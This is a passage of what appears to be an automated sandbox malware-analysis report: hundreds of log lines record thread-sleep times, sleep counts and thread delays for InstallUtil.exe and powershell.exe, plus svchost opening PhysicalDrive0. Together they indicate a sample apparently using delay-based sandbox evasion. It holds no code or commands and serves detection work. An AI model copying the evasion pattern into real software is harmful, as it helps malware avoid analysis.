                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598016s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597422s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597313s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597188s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -597078s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -596969s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -596083s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595953s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594513s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594406s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594297s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594181s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -594055s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -593924s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -593793s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -593391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -593281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -593172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -593059s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep count: 43 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -39660499758475511s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2812Thread sleep count: 4991 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599871s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599750s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599640s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6404Thread sleep count: 4844 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599421s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599312s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599201s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -599093s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598973s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598852s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598750s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598640s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598422s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598312s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -598094s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597969s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597859s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597750s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597524s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597420s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597133s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -597031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596812s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596703s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596593s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596266s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596141s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -596031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595812s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595703s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595594s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595156s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -595046s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -594933s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -594828s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -594716s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -594426s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -594281s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3744Thread sleep time: -594139s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep count: 40 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -36893488147419080s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3780Thread sleep count: 4640 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599890s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3780Thread sleep count: 5201 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599671s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599343s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599233s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599124s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -599015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598796s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598577s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598468s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598358s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598248s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598140s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -598030s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597921s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597718s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597605s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597499s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597390s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597281s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597160s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596921s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596812s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596703s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596593s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596374s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596155s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596046s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595936s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595827s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595718s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595609s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595496s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595146s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594960s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594843s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594734s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594624s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594515s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594281s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4232Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -16602069666338586s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep count: 5174 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep count: 763 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599447Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599338Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598898Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598790Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596083Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594513Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594181Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594055Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593924Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593059Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599871
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599421
